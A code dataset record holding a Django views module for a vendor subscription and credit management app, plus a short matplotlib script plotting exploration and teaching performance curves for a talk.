hexsha
string | size
int64 | ext
string | lang
string | max_stars_repo_path
string | max_stars_repo_name
string | max_stars_repo_head_hexsha
string | max_stars_repo_licenses
list | max_stars_count
int64 | max_stars_repo_stars_event_min_datetime
string | max_stars_repo_stars_event_max_datetime
string | max_issues_repo_path
string | max_issues_repo_name
string | max_issues_repo_head_hexsha
string | max_issues_repo_licenses
list | max_issues_count
int64 | max_issues_repo_issues_event_min_datetime
string | max_issues_repo_issues_event_max_datetime
string | max_forks_repo_path
string | max_forks_repo_name
string | max_forks_repo_head_hexsha
string | max_forks_repo_licenses
list | max_forks_count
int64 | max_forks_repo_forks_event_min_datetime
string | max_forks_repo_forks_event_max_datetime
string | content
string | avg_line_length
float64 | max_line_length
int64 | alphanum_fraction
float64 | qsc_code_num_words_quality_signal
int64 | qsc_code_num_chars_quality_signal
float64 | qsc_code_mean_word_length_quality_signal
float64 | qsc_code_frac_words_unique_quality_signal
float64 | qsc_code_frac_chars_top_2grams_quality_signal
float64 | qsc_code_frac_chars_top_3grams_quality_signal
float64 | qsc_code_frac_chars_top_4grams_quality_signal
float64 | qsc_code_frac_chars_dupe_5grams_quality_signal
float64 | qsc_code_frac_chars_dupe_6grams_quality_signal
float64 | qsc_code_frac_chars_dupe_7grams_quality_signal
float64 | qsc_code_frac_chars_dupe_8grams_quality_signal
float64 | qsc_code_frac_chars_dupe_9grams_quality_signal
float64 | qsc_code_frac_chars_dupe_10grams_quality_signal
float64 | qsc_code_frac_chars_replacement_symbols_quality_signal
float64 | qsc_code_frac_chars_digital_quality_signal
float64 | qsc_code_frac_chars_whitespace_quality_signal
float64 | qsc_code_size_file_byte_quality_signal
float64 | qsc_code_num_lines_quality_signal
float64 | qsc_code_num_chars_line_max_quality_signal
float64 | qsc_code_num_chars_line_mean_quality_signal
float64 | qsc_code_frac_chars_alphabet_quality_signal
float64 | qsc_code_frac_chars_comments_quality_signal
float64 | qsc_code_cate_xml_start_quality_signal
float64 | qsc_code_frac_lines_dupe_lines_quality_signal
float64 | qsc_code_cate_autogen_quality_signal
float64 | qsc_code_frac_lines_long_string_quality_signal
float64 | qsc_code_frac_chars_string_length_quality_signal
float64 | qsc_code_frac_chars_long_word_length_quality_signal
float64 | qsc_code_frac_lines_string_concat_quality_signal
float64 | qsc_code_cate_encoded_data_quality_signal
float64 | qsc_code_frac_chars_hex_words_quality_signal
float64 | qsc_code_frac_lines_prompt_comments_quality_signal
float64 | qsc_code_frac_lines_assert_quality_signal
float64 | qsc_codepython_cate_ast_quality_signal
float64 | qsc_codepython_frac_lines_func_ratio_quality_signal
float64 | qsc_codepython_cate_var_zero_quality_signal
bool | qsc_codepython_frac_lines_pass_quality_signal
float64 | qsc_codepython_frac_lines_import_quality_signal
float64 | qsc_codepython_frac_lines_simplefunc_quality_signal
float64 | qsc_codepython_score_lines_no_logic_quality_signal
float64 | qsc_codepython_frac_lines_print_quality_signal
float64 | qsc_code_num_words
int64 | qsc_code_num_chars
int64 | qsc_code_mean_word_length
int64 | qsc_code_frac_words_unique
null | qsc_code_frac_chars_top_2grams
int64 | qsc_code_frac_chars_top_3grams
int64 | qsc_code_frac_chars_top_4grams
int64 | qsc_code_frac_chars_dupe_5grams
int64 | qsc_code_frac_chars_dupe_6grams
int64 | qsc_code_frac_chars_dupe_7grams
int64 | qsc_code_frac_chars_dupe_8grams
int64 | qsc_code_frac_chars_dupe_9grams
int64 | qsc_code_frac_chars_dupe_10grams
int64 | qsc_code_frac_chars_replacement_symbols
int64 | qsc_code_frac_chars_digital
int64 | qsc_code_frac_chars_whitespace
int64 | qsc_code_size_file_byte
int64 | qsc_code_num_lines
int64 | qsc_code_num_chars_line_max
int64 | qsc_code_num_chars_line_mean
int64 | qsc_code_frac_chars_alphabet
int64 | qsc_code_frac_chars_comments
int64 | qsc_code_cate_xml_start
int64 | qsc_code_frac_lines_dupe_lines
int64 | qsc_code_cate_autogen
int64 | qsc_code_frac_lines_long_string
int64 | qsc_code_frac_chars_string_length
int64 | qsc_code_frac_chars_long_word_length
int64 | qsc_code_frac_lines_string_concat
null | qsc_code_cate_encoded_data
int64 | qsc_code_frac_chars_hex_words
int64 | qsc_code_frac_lines_prompt_comments
int64 | qsc_code_frac_lines_assert
int64 | qsc_codepython_cate_ast
int64 | qsc_codepython_frac_lines_func_ratio
int64 | qsc_codepython_cate_var_zero
int64 | qsc_codepython_frac_lines_pass
int64 | qsc_codepython_frac_lines_import
int64 | qsc_codepython_frac_lines_simplefunc
int64 | qsc_codepython_score_lines_no_logic
int64 | qsc_codepython_frac_lines_print
int64 | effective
string | hits
int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
44f254ddff0718eff73b4b94f45ec698474855bf
| 32,114
|
py
|
Python
|
aao_vender/views.py
|
sukalyan/aao_nxt_vendor
|
fde5e96b9357f097ee33d91f495be8f03a86bcbb
|
[
"MIT"
] | null | null | null |
aao_vender/views.py
|
sukalyan/aao_nxt_vendor
|
fde5e96b9357f097ee33d91f495be8f03a86bcbb
|
[
"MIT"
] | 1
|
2021-10-30T06:46:46.000Z
|
2021-10-30T06:46:57.000Z
|
aao_vender/views.py
|
sukalyan/aao_nxt_vendor
|
fde5e96b9357f097ee33d91f495be8f03a86bcbb
|
[
"MIT"
] | null | null | null |
from django.shortcuts import render,redirect
from django.http import HttpResponseRedirect,HttpResponse
from django.contrib.auth.models import User
from django.contrib.auth.models import Group
from django.contrib import messages
from django.contrib.auth.decorators import login_required
from django.contrib.auth.decorators import user_passes_test
from .models import *
from .utils import transection_fun,creat_remote_user,create_remote_user2
from datetime import date, timedelta
from django.utils import timezone
import pytz
import secrets
@login_required(login_url='/login/')
@user_passes_test(lambda u: u.is_superuser)
def create_vender(request):
    """Superuser-only view: show the vendor form (GET) or create a vendor (POST).

    On POST, validates password confirmation and email/username uniqueness,
    then creates the auth User, its Vender_Details row (with random API
    credentials) and adds the user to the 'vender' group.

    Fixes vs. original: removed a duplicated ``email`` POST read, a dead
    ``form`` dict built (but never used) in the GET branch, and debug prints;
    the repopulation dict is now built once instead of three times.
    """
    if request.method == "GET":
        return render(request, 'vender/vender_form.html')
    # POST: collect submitted fields
    first_name = request.POST.get("first_name")
    last_name = request.POST.get("last_name")
    username = request.POST.get("username")
    email = request.POST.get("email")
    mobile_no = request.POST.get("mobile_no")
    password = request.POST.get("password")
    confirm_password = request.POST.get("confirm_password")
    # Context used to repopulate the form on any validation error.
    form = {'first_name': first_name, 'last_name': last_name,
            'username': username, 'email': email, 'mobile_no': mobile_no}
    if password != confirm_password:
        messages.error(request, "confirm password missmatch")
        return render(request, 'vender/vender_form.html', form)
    if User.objects.filter(email=email.lower()).exists():
        messages.error(request, "email alredy exist use another email")
        return render(request, 'vender/vender_form.html', form)
    if User.objects.filter(username=username).exists():
        messages.error(request, "username alredy exist use another username")
        return render(request, 'vender/vender_form.html', form)
    user = User.objects.create_user(
        first_name=first_name,
        last_name=last_name,
        username=username,
        password=password,
        email=email,
        is_active=True,
    )
    user.save()
    vender = Vender_Details(
        vd_user=user,
        vd_mob_number=str(mobile_no),
        vd_is_active=True,
        # Random, hard-to-guess API credentials for this vendor.
        vd_api_key=secrets.token_hex(4) + "_" + secrets.token_hex(16),
        vd_api_secrate=secrets.token_hex(4) + "_" + secrets.token_hex(16),
    )
    vender.save()
    profile_user = User.objects.get(username=username)
    my_group = Group.objects.get(name='vender')
    profile_user.groups.add(my_group)
    messages.success(request, "vender created successfully.")
    return redirect('view_vender')
@login_required(login_url='/login/')
@user_passes_test(lambda u: u.is_superuser)
def view_vender(request):
    """Superuser-only view: first page (20 rows) of vendors, oldest first."""
    if request.method == 'GET':
        page_size = 20
        vendors = Vender_Details.objects.filter(vd_user__groups__name='vender')
        page = vendors.order_by('vd_created_at')[:page_size]
        context = {
            "query_results": page,
            'totaldata': vendors.count(),
            'curent_page': 1,
            'pagedata_starting': 0,
            'prev_pagenumber': 1,
            'next_page_number': 2,
            'showingdata': page.count(),
        }
        return render(request, 'vender/vender_view.html', context)
@login_required(login_url='/login/')
@user_passes_test(lambda u: u.is_superuser)
def view_vender_pagination(request, page_number):
    """Superuser-only view: page *page_number* (20 rows/page) of vendors.

    Robustness fix: the original converted ``page_number`` to int only
    inside the ``!= 1`` branch, so a string page number from the URL would
    crash there (``'1' != 1`` is also True, skipping the first-page branch).
    It is now coerced once up front.
    """
    if request.method == 'GET':
        page_number = int(page_number)
        if page_number != 1:
            curent_page = page_number
            prev_pagenumber = curent_page - 1
            pagedata_starting = (page_number - 1) * 20
        else:
            curent_page = 1
            prev_pagenumber = 1
            pagedata_starting = 0
        pagedata_ending = pagedata_starting + 20
        next_page_number = curent_page + 1
        totaldata = Vender_Details.objects.filter(
            vd_user__groups__name='vender').count()
        query_results = Vender_Details.objects.filter(
            vd_user__groups__name='vender').order_by('vd_created_at')[pagedata_starting:pagedata_ending]
        showingdata = query_results.count()
        context = {"query_results": query_results,
                   'totaldata': totaldata,
                   'curent_page': curent_page,
                   'pagedata_starting': pagedata_starting,
                   'prev_pagenumber': prev_pagenumber,
                   'next_page_number': next_page_number,
                   'showingdata': showingdata,
                   }
        return render(request, 'vender/vender_view.html', context)
@login_required(login_url='/login/')
@user_passes_test(lambda u: u.is_superuser)
def users_of_vender(request, user_id):
    """Superuser-only view: first page (20 rows) of AAO users owned by
    the vendor whose User pk is *user_id*, oldest first."""
    if request.method == 'GET':
        page_size = 20
        vendor_user = User.objects.get(pk=user_id)
        owned = Aoo_User_Details.objects.filter(aud_vender=vendor_user)
        page = owned.order_by('aud_created_at')[:page_size]
        context = {
            "query_results": page,
            'totaldata': owned.count(),
            'curent_page': 1,
            'pagedata_starting': 0,
            'prev_pagenumber': 1,
            'next_page_number': 2,
            'showingdata': page.count(),
            'user_id': user_id,
        }
        return render(request, 'vender/users_of_vender_view.html', context)
@login_required(login_url='/login/')
@user_passes_test(lambda u: u.is_superuser)
def users_of_vender_pagination(request, user_id, page_number):
    """Superuser-only view: page *page_number* (20 rows/page) of AAO users
    owned by vendor *user_id*.

    Robustness fix: ``page_number`` is coerced to int once up front; the
    original converted only inside the ``!= 1`` branch, so a string page
    number from the URL would crash.
    """
    if request.method == 'GET':
        page_number = int(page_number)
        if page_number != 1:
            curent_page = page_number
            prev_pagenumber = curent_page - 1
            pagedata_starting = (page_number - 1) * 20
        else:
            curent_page = 1
            prev_pagenumber = 1
            pagedata_starting = 0
        pagedata_ending = pagedata_starting + 20
        next_page_number = curent_page + 1
        user_data = User.objects.get(pk=user_id)
        totaldata = Aoo_User_Details.objects.filter(
            aud_vender=user_data).count()
        query_results = Aoo_User_Details.objects.filter(
            aud_vender=user_data).order_by('aud_created_at')[pagedata_starting:pagedata_ending]
        showingdata = query_results.count()
        context = {"query_results": query_results,
                   'totaldata': totaldata,
                   'curent_page': curent_page,
                   'pagedata_starting': pagedata_starting,
                   'prev_pagenumber': prev_pagenumber,
                   'next_page_number': next_page_number,
                   'showingdata': showingdata,
                   'user_id': user_id,
                   }
        return render(request, 'vender/users_of_vender_view.html', context)
@login_required(login_url='/login/')
@user_passes_test(lambda u: u.is_superuser)
def vender_details(request, used_id):
    """Superuser-only view: dashboard for the vendor whose User pk is *used_id*.

    Redirects back to the vendor list with an error if no such user exists.
    """
    if request.method == 'GET':
        if not User.objects.filter(pk=used_id).exists():
            messages.error(request, "user not found.")
            return redirect('view_vender')
        owner = User.objects.get(pk=used_id)
        details = Vender_Details.objects.filter(vd_user=owner)
        return render(request, 'vender/vender_dashboard.html',
                      {"vender_details": details})
@login_required(login_url='/login/')
@user_passes_test(lambda u: u.is_superuser)
def vender_add_credit(request, used_id):
    """Superuser-only POST handler: add credit to vendor *used_id*'s balance.

    Fix vs. original: the "credit_amount" POST field was read twice; the
    duplicate read is removed.
    """
    if request.method == 'POST':
        if User.objects.filter(pk=used_id).exists():
            user = User.objects.get(pk=used_id)
            vender_details = Vender_Details.objects.get(vd_user=user)
            credit_amount = float(request.POST.get("credit_amount"))
            vender_details.vd_aao_balance = vender_details.vd_aao_balance + credit_amount
            vender_details.save()
            context = {"vender_details": Vender_Details.objects.filter(vd_user=user)}
            return render(request, 'vender/vender_dashboard.html', context)
        else:
            messages.error(request, "user not found.")
            return redirect('view_vender')
    else:
        messages.error(request, "method not allowed")
        return redirect('view_vender')
@login_required(login_url='/login/')
@user_passes_test(lambda u: u.is_superuser)
def vender_add_plan(request, used_id):
    """Superuser-only POST handler: set the subscription plan of vendor *used_id*."""
    if request.method != 'POST':
        messages.error(request, "method not allowed")
        return redirect('view_vender')
    if not User.objects.filter(pk=used_id).exists():
        messages.error(request, "user not found.")
        return redirect('view_vender')
    owner = User.objects.get(pk=used_id)
    details = Vender_Details.objects.get(vd_user=owner)
    details.vd_plan_subscribe = request.POST.get("vender_plan")
    details.save()
    # Re-query so the dashboard sees the freshly-saved values.
    context = {"vender_details": Vender_Details.objects.filter(vd_user=owner)}
    return render(request, 'vender/vender_dashboard.html', context)
@login_required(login_url='/login/')
@user_passes_test(lambda u: u.is_superuser)
def vender_add_per_user_price(request, used_id):
    """Superuser-only POST handler: set vendor *used_id*'s per-user price."""
    if request.method != 'POST':
        messages.error(request, "method not allowed")
        return redirect('view_vender')
    if not User.objects.filter(pk=used_id).exists():
        messages.error(request, "user not found.")
        return redirect('view_vender')
    owner = User.objects.get(pk=used_id)
    details = Vender_Details.objects.get(vd_user=owner)
    details.vd_per_user_price = float(request.POST.get("per_user_price"))
    details.save()
    # Re-query so the dashboard sees the freshly-saved values.
    context = {"vender_details": Vender_Details.objects.filter(vd_user=owner)}
    return render(request, 'vender/vender_dashboard.html', context)
@login_required(login_url='/login/')
def vender_dashboard(request):
    """Dashboard for the logged-in vendor (their own Vender_Details)."""
    if request.method == 'GET':
        if not User.objects.filter(pk=request.user.id).exists():
            messages.error(request, "user not found.")
            return redirect('view_vender')
        owner = User.objects.get(pk=request.user.id)
        context = {"vender_details": Vender_Details.objects.filter(vd_user=owner)}
        return render(request, 'vender/vender_dashboard.html', context)
@login_required(login_url='/login/')
def create_aao_user(request):
    """Vendor view: show the AAO-user form (GET) or create a subscription (POST).

    POST flow: if the mobile number / email / username already exists for
    this vendor, redirect to that user's order page so the vendor can extend
    the package instead.  Otherwise verify the vendor has enough credit,
    provision the user on the remote aoonxt server, persist the local
    Aoo_User_Details row and record the transaction.

    Bug fix vs. original: in the username-exists branch the redirect target
    was re-queried by ``aud_mobile_number`` instead of ``aud_username``,
    which raises IndexError whenever the username clashes but the mobile
    number differs.  The lookup now reuses the queryset that matched.
    Debug prints and triplicated form-dict construction were also removed.
    """
    current_user = request.user
    if request.method == "GET":
        vender_details = Vender_Details.objects.filter(vd_user=current_user)
        return render(request, 'vender/create_user_form.html',
                      {"vender_details": vender_details})
    month = 30  # days per billed month
    username = request.POST.get("username")
    email_id = request.POST.get("email_id")
    mobile_number = request.POST.get("mobile_number")
    input_month = int(request.POST.get("package_categtory"))
    existing = Aoo_User_Details.objects.filter(
        aud_mobile_number=mobile_number, aud_vender=current_user)
    if existing.exists():
        messages.error(request, "mobile number alredy exist extend the package")
        return redirect('view_aao_user_order',
                        aao_user_id=existing.order_by('aud_id')[0].aud_id)
    existing = Aoo_User_Details.objects.filter(
        aud_email=email_id.lower(), aud_vender=current_user)
    if existing.exists():
        messages.error(request, "email alredy exist extend the package")
        return redirect('view_aao_user_order',
                        aao_user_id=existing.order_by('aud_id')[0].aud_id)
    existing = Aoo_User_Details.objects.filter(
        aud_username=username, aud_vender=current_user)
    if existing.exists():
        messages.error(request, "username alredy exist extend the package")
        # Fixed lookup: redirect to the row that matched on username.
        return redirect('view_aao_user_order',
                        aao_user_id=existing.order_by('aud_id')[0].aud_id)
    # Context used to repopulate the form on any failure below.
    form = {'package_categtory': input_month, 'username': username,
            'email_id': email_id, 'mobile_number': mobile_number}
    vender_details = Vender_Details.objects.get(vd_user=current_user)
    peruser_price = vender_details.vd_per_user_price
    remaining_balance = vender_details.vd_aao_balance
    vender_plan = vender_details.vd_plan_subscribe
    totalprice = peruser_price * input_month
    duration_in_days = month * input_month
    if (remaining_balance - totalprice) < 0:
        messages.error(request, "you dont have enough credit ")
        return render(request, 'vender/create_user_form.html', form)
    # Provision on the remote aoonxt server before saving anything locally.
    return_status = create_remote_user2(mobile_number, username, vender_plan)
    if "success" in return_status:
        if return_status['success'] == False:
            messages.error(request, return_status['message'])
            return render(request, 'vender/create_user_form.html', form)
    elif "fail_server" in return_status:
        messages.error(request, "fail_server" + return_status['fail_server'])
        return render(request, 'vender/create_user_form.html', form)
    else:
        message_aao = "message from aoonxt server" + str(return_status)
        messages.error(request, message_aao)
        return render(request, 'vender/create_user_form.html', form)
    start_date = str(timezone.now())
    end_date = str(timezone.now() + timezone.timedelta(days=duration_in_days))
    user_aao = Aoo_User_Details(
        aud_vender=current_user,
        aud_username=username,
        aud_email=email_id,
        aud_mobile_number=mobile_number,
        aud_subsc_package=input_month,
        aud_start_date=start_date,
        aud_end_date=end_date,
    )
    user_aao.save()
    user_data = {'username': username,
                 'email_id': email_id,
                 'mobile_number': mobile_number,
                 'totalmonth': input_month,
                 'start_date': start_date,
                 'end_date': end_date,
                 'peruser_price': peruser_price,
                 'remaining_balance': remaining_balance}
    # Debit the vendor and record the order/transaction.
    result_tran = transection_fun(current_user, user_aao, totalprice, user_data, vender_plan)
    if result_tran:
        messages.success(request, "user subscription created successfully.")
    else:
        messages.error(request, "something went wrong")
    return redirect('create_aao_user')
@login_required(login_url='/login/')
def create_aao_user_extend_package(request):
    """Vendor POST handler: extend an existing AAO user's subscription.

    Verifies the vendor's credit, re-provisions the user on the remote
    aoonxt server, then stacks the new package on top of the last order:
    if the previous order has not yet expired the new period starts the
    day after it ends, otherwise it starts now.

    Fixes vs. original: the ``Aoo_User_Details`` row was fetched twice with
    the identical query (the second fetch is removed and the first row is
    reused), and debug prints were dropped.
    """
    if request.method == "POST":
        month = 30  # days per billed month
        current_user = request.user
        username = request.POST.get("username")
        email_id = request.POST.get("email_id")
        mobile_number = request.POST.get("mobile_number")
        input_month = int(request.POST.get("package_categtory"))
        # Context used to repopulate the form on any failure below.
        form = {'package_categtory': input_month, 'username': username,
                'email_id': email_id, 'mobile_number': mobile_number}
        vender_details = Vender_Details.objects.get(vd_user=current_user)
        peruser_price = vender_details.vd_per_user_price
        remaining_balance = vender_details.vd_aao_balance
        vender_plan = vender_details.vd_plan_subscribe
        totalprice = peruser_price * input_month
        duration_in_days = month * input_month
        if (remaining_balance - totalprice) < 0:
            messages.error(request, "you dont have enough credit ")
            return render(request, 'vender/create_user_form.html', form)
        return_status = create_remote_user2(mobile_number, username, vender_plan)
        if "success" in return_status:
            if return_status['success'] == False:
                messages.error(request, return_status['message'])
                return render(request, 'vender/create_user_form.html', form)
        elif "fail_server" in return_status:
            messages.error(request, "fail_server" + return_status['fail_server'])
            return render(request, 'vender/create_user_form.html', form)
        else:
            message_aao = "message from aoonxt server" + str(return_status)
            messages.error(request, message_aao)
            return render(request, 'vender/create_user_form.html', form)
        # NOTE(review): lookup is by mobile number only, not scoped to this
        # vendor — confirm mobile numbers are unique across vendors.
        user_details = Aoo_User_Details.objects.get(aud_mobile_number=mobile_number)
        last_order = Aoo_User_Order_Details.objects.filter(
            auod_user=user_details).order_by('-auod_created_at')[0]
        last_order_end_date = last_order.auod_end_date
        if last_order_end_date >= timezone.now():
            # Previous order still active: new period starts the day after it ends.
            start_date = last_order_end_date + timezone.timedelta(days=1)
        else:
            start_date = timezone.now()
        end_date = str(start_date + timezone.timedelta(days=duration_in_days))
        user_details.aud_subsc_package = input_month
        user_details.aud_start_date = start_date
        user_details.aud_end_date = end_date
        user_details.save()
        user_data = {'username': username,
                     'email_id': email_id,
                     'mobile_number': mobile_number,
                     'totalmonth': input_month,
                     'start_date': start_date,
                     'end_date': end_date,
                     'peruser_price': peruser_price,
                     'remaining_balance': remaining_balance}
        result_tran = transection_fun(current_user, user_details, totalprice, user_data, vender_plan)
        if result_tran:
            messages.success(request, "user subscription extended successfully.")
        else:
            messages.error(request, "something went wrong")
        return redirect('view_aao_user_order', aao_user_id=user_details.aud_id)
@login_required(login_url='/login/')
def view_aao_user(request):
    """First page (20 rows) of the logged-in vendor's AAO users, oldest first."""
    if request.method == 'GET':
        page_size = 20
        owned = Aoo_User_Details.objects.filter(aud_vender=request.user)
        page = owned.order_by('aud_created_at')[:page_size]
        context = {
            "query_results": page,
            'totaldata': owned.count(),
            'curent_page': 1,
            'pagedata_starting': 0,
            'prev_pagenumber': 1,
            'next_page_number': 2,
            'showingdata': page.count(),
        }
        return render(request, 'vender/aoo_user_view.html', context)
@login_required(login_url='/login/')
def view_aao_user_pagination(request, page_number):
    """Page *page_number* (20 rows/page) of the logged-in vendor's AAO users.

    Robustness fix: ``page_number`` is coerced to int once up front; the
    original converted only inside the ``!= 1`` branch, so a string page
    number from the URL would crash.
    """
    if request.method == 'GET':
        current_user = request.user
        page_number = int(page_number)
        if page_number != 1:
            curent_page = page_number
            prev_pagenumber = curent_page - 1
            pagedata_starting = (page_number - 1) * 20
        else:
            curent_page = 1
            prev_pagenumber = 1
            pagedata_starting = 0
        pagedata_ending = pagedata_starting + 20
        next_page_number = curent_page + 1
        totaldata = Aoo_User_Details.objects.filter(
            aud_vender=current_user).count()
        query_results = Aoo_User_Details.objects.filter(
            aud_vender=current_user).order_by('aud_created_at')[pagedata_starting:pagedata_ending]
        showingdata = query_results.count()
        context = {"query_results": query_results,
                   'totaldata': totaldata,
                   'curent_page': curent_page,
                   'pagedata_starting': pagedata_starting,
                   'prev_pagenumber': prev_pagenumber,
                   'next_page_number': next_page_number,
                   'showingdata': showingdata,
                   }
        return render(request, 'vender/aoo_user_view.html', context)
@login_required(login_url='/login/')
def view_aao_user_order(request, aao_user_id):
    """First page (20 rows) of orders for AAO user *aao_user_id*, oldest first."""
    if request.method == 'GET':
        page_size = 20
        vendor_rows = Vender_Details.objects.filter(vd_user=request.user)
        aao_user = Aoo_User_Details.objects.get(pk=aao_user_id)
        aao_user_rows = Aoo_User_Details.objects.filter(pk=aao_user_id)
        orders = Aoo_User_Order_Details.objects.filter(auod_user=aao_user)
        page = orders.order_by('auod_created_at')[:page_size]
        context = {
            "query_results": page,
            'totaldata': orders.count(),
            'curent_page': 1,
            'pagedata_starting': 0,
            'prev_pagenumber': 1,
            'next_page_number': 2,
            'showingdata': page.count(),
            'aao_user_id': aao_user_id,
            'aao_user_detail': aao_user_rows,
            'vender_details': vendor_rows,
        }
        return render(request, 'vender/aoo_user_order_view.html', context)
@login_required(login_url='/login/')
def view_aao_user_order_pagination(request, aao_user_id, page_number):
    """Page *page_number* (20 rows/page) of orders for AAO user *aao_user_id*.

    Robustness fix: ``page_number`` is coerced to int once up front; the
    original converted only inside the ``!= 1`` branch, so a string page
    number from the URL would crash.
    """
    if request.method == 'GET':
        current_user = request.user
        vender_details = Vender_Details.objects.filter(vd_user=current_user)
        page_number = int(page_number)
        if page_number != 1:
            curent_page = page_number
            prev_pagenumber = curent_page - 1
            pagedata_starting = (page_number - 1) * 20
        else:
            curent_page = 1
            prev_pagenumber = 1
            pagedata_starting = 0
        pagedata_ending = pagedata_starting + 20
        next_page_number = curent_page + 1
        aao_user = Aoo_User_Details.objects.get(pk=aao_user_id)
        aao_user_detail = Aoo_User_Details.objects.filter(pk=aao_user_id)
        totaldata = Aoo_User_Order_Details.objects.filter(
            auod_user=aao_user).count()
        query_results = Aoo_User_Order_Details.objects.filter(
            auod_user=aao_user).order_by('auod_created_at')[pagedata_starting:pagedata_ending]
        showingdata = query_results.count()
        context = {"query_results": query_results,
                   'totaldata': totaldata,
                   'curent_page': curent_page,
                   'pagedata_starting': pagedata_starting,
                   'prev_pagenumber': prev_pagenumber,
                   'next_page_number': next_page_number,
                   'showingdata': showingdata,
                   'aao_user_id': aao_user_id,
                   'aao_user_detail': aao_user_detail,
                   'vender_details': vender_details,
                   }
        return render(request, 'vender/aoo_user_order_view.html', context)
@login_required(login_url='/login/')
def vender_transection_view(request):
    """First page (20 rows) of the logged-in vendor's transactions, oldest first."""
    if request.method == 'GET':
        page_size = 20
        transactions = Vender_Transection_Details.objects.filter(
            vtd_vender=request.user)
        page = transactions.order_by('vtd_created_at')[:page_size]
        context = {
            "query_results": page,
            'totaldata': transactions.count(),
            'curent_page': 1,
            'pagedata_starting': 0,
            'prev_pagenumber': 1,
            'next_page_number': 2,
            'showingdata': page.count(),
        }
        return render(request, 'vender/vender_transection_view.html', context)
@login_required(login_url='/login/')
def vender_transection_view_pagination(request, page_number):
    """Page *page_number* (20 rows/page) of the logged-in vendor's transactions.

    Robustness fix: ``page_number`` is coerced to int once up front; the
    original converted only inside the ``!= 1`` branch, so a string page
    number from the URL would crash.
    """
    if request.method == 'GET':
        current_user = request.user
        page_number = int(page_number)
        if page_number != 1:
            curent_page = page_number
            prev_pagenumber = curent_page - 1
            pagedata_starting = (page_number - 1) * 20
        else:
            curent_page = 1
            prev_pagenumber = 1
            pagedata_starting = 0
        pagedata_ending = pagedata_starting + 20
        next_page_number = curent_page + 1
        totaldata = Vender_Transection_Details.objects.filter(
            vtd_vender=current_user).count()
        query_results = Vender_Transection_Details.objects.filter(
            vtd_vender=current_user).order_by('vtd_created_at')[pagedata_starting:pagedata_ending]
        showingdata = query_results.count()
        context = {"query_results": query_results,
                   'totaldata': totaldata,
                   'curent_page': curent_page,
                   'pagedata_starting': pagedata_starting,
                   'prev_pagenumber': prev_pagenumber,
                   'next_page_number': next_page_number,
                   'showingdata': showingdata,
                   }
        return render(request, 'vender/vender_transection_view.html', context)
| 37.34186
| 130
| 0.618609
| 3,529
| 32,114
| 5.287334
| 0.052423
| 0.034836
| 0.039659
| 0.040195
| 0.906587
| 0.892867
| 0.871644
| 0.851975
| 0.837183
| 0.818961
| 0
| 0.005678
| 0.28704
| 32,114
| 859
| 131
| 37.385332
| 0.809268
| 0.029956
| 0
| 0.76412
| 0
| 0
| 0.13763
| 0.026793
| 0
| 0
| 0
| 0
| 0
| 1
| 0.0299
| false
| 0.028239
| 0.021595
| 0
| 0.121262
| 0.009967
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
789633e14b61a517e645a348fb8dde9098c8686b
| 1,631
|
py
|
Python
|
talk_plots.py
|
firekg/Explore-vs-Teach
|
2b3b6b8fbc61e28fda75555d5bf0e068f0a9ab8a
|
[
"MIT"
] | null | null | null |
talk_plots.py
|
firekg/Explore-vs-Teach
|
2b3b6b8fbc61e28fda75555d5bf0e068f0a9ab8a
|
[
"MIT"
] | null | null | null |
talk_plots.py
|
firekg/Explore-vs-Teach
|
2b3b6b8fbc61e28fda75555d5bf0e068f0a9ab8a
|
[
"MIT"
] | 1
|
2018-10-28T11:52:37.000Z
|
2018-10-28T11:52:37.000Z
|
import matplotlib.pyplot as plt
import seaborn as sns  # imported for its side effect on matplotlib styling


def _perf_figure(x, y, xlabel, ylabel, outfile):
    """Draw one performance-vs-observations talk figure and save it as a PDF.

    :param x: observation counts; also used as the x tick positions
    :param y: performance values drawn as a red line, or None for a blank axes
    :param xlabel: x-axis label
    :param ylabel: y-axis label
    :param outfile: path of the PDF file to write
    """
    plt.figure(figsize=(6, 6))
    if y is not None:
        plt.plot(x, y, 'r-')
    plt.xlim([-0.01, 3.01])
    plt.xticks(x, [str(v) for v in x])
    plt.ylim([-0.01, 1.01])
    plt.xlabel(xlabel, fontsize=20)
    plt.ylabel(ylabel, fontsize=20)
    plt.savefig(outfile)


if __name__ == '__main__':
    x = [0, 1, 2, 3]
    # Exploration plateaus after one observation; teaching keeps improving.
    ye = [0.5, 0.75, 0.5, 0.5]
    yt = [0.5, 0.75, 1, 1]

    # Blank axes (no curve) used as a build-up slide in the talk.
    _perf_figure(x, None, "Number of observations", "Exploration performance",
                 '../talk/talk_blank_perf.pdf')
    _perf_figure(x, ye, "Number of observations", "Exploration performance",
                 '../talk/talk_exploration_perf.pdf')
    _perf_figure(x, yt, "Number of observations", "Teaching performance",
                 '../talk/talk_teaching_perf.pdf')

    # Exploration vs teaching performance; the dotted diagonal marks equality.
    # The original called plt.hold(True)/plt.hold(False), which was removed in
    # matplotlib 3.0 (hold-on has been the default since 2.0), so those calls
    # are dropped here.
    plt.figure(figsize=(6, 6))
    plt.plot([0, 1], [0, 1], 'k:', alpha=.5)
    plt.plot(ye, yt, 'r-')
    plt.xlim([-0.01, 1.01])
    plt.ylim([-0.01, 1.01])
    plt.xlabel("Exploration performance", fontsize=20)
    plt.ylabel("Teaching performance", fontsize=20)
    plt.savefig('../talk/talk_evst.pdf')
| 30.203704
| 54
| 0.56591
| 281
| 1,631
| 3.231317
| 0.177936
| 0.022026
| 0.114537
| 0.030837
| 0.842511
| 0.811674
| 0.809471
| 0.809471
| 0.785242
| 0.785242
| 0
| 0.115975
| 0.201717
| 1,631
| 53
| 55
| 30.773585
| 0.581413
| 0
| 0
| 0.714286
| 0
| 0
| 0.19252
| 0.068056
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.040816
| 0
| 0.040816
| 0
| 0
| 0
| 0
